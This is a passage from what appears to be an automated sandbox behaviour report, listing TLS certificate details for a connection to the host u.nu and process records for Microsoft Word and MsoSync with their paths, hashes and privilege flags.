                                                                                                                                                        May 6, 2021 14:46:04.647124052 CEST185.255.55.12443192.168.2.549718CN=u.nu CN=GoGetSSL RSA DV CA, O=GoGetSSL, L=Riga, C=LV CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=GoGetSSL RSA DV CA, O=GoGetSSL, L=Riga, C=LV CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USThu Jan 30 01:00:00 CET 2020 Thu Sep 06 02:00:00 CEST 2018 Mon Feb 01 01:00:00 CET 2010Sun Jan 30 00:59:59 CET 2022 Wed Sep 06 01:59:59 CEST 2028 Tue Jan 19 00:59:59 CET 2038771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                        CN=GoGetSSL RSA DV CA, O=GoGetSSL, L=Riga, C=LVCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USThu Sep 06 02:00:00 CEST 2018Wed Sep 06 01:59:59 CEST 2028
                                                                                                                                                        CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USMon Feb 01 01:00:00 CET 2010Tue Jan 19 00:59:59 CET 2038

                                                                                                                                                        Code Manipulations

                                                                                                                                                        Statistics

                                                                                                                                                        CPU Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Memory Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                        Behavior

                                                                                                                                                        Click to jump to process

                                                                                                                                                        System Behavior

                                                                                                                                                        General

                                                                                                                                                        Start time:14:45:56
                                                                                                                                                        Start date:06/05/2021
                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
                                                                                                                                                        Imagebase:0xb70000
                                                                                                                                                        File size:1937688 bytes
                                                                                                                                                        MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:14:45:59
                                                                                                                                                        Start date:06/05/2021
                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                        Imagebase:0xeb0000
                                                                                                                                                        File size:466688 bytes
                                                                                                                                                        MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:moderate

                                                                                                                                                        Disassembly

                                                                                                                                                        Reset < >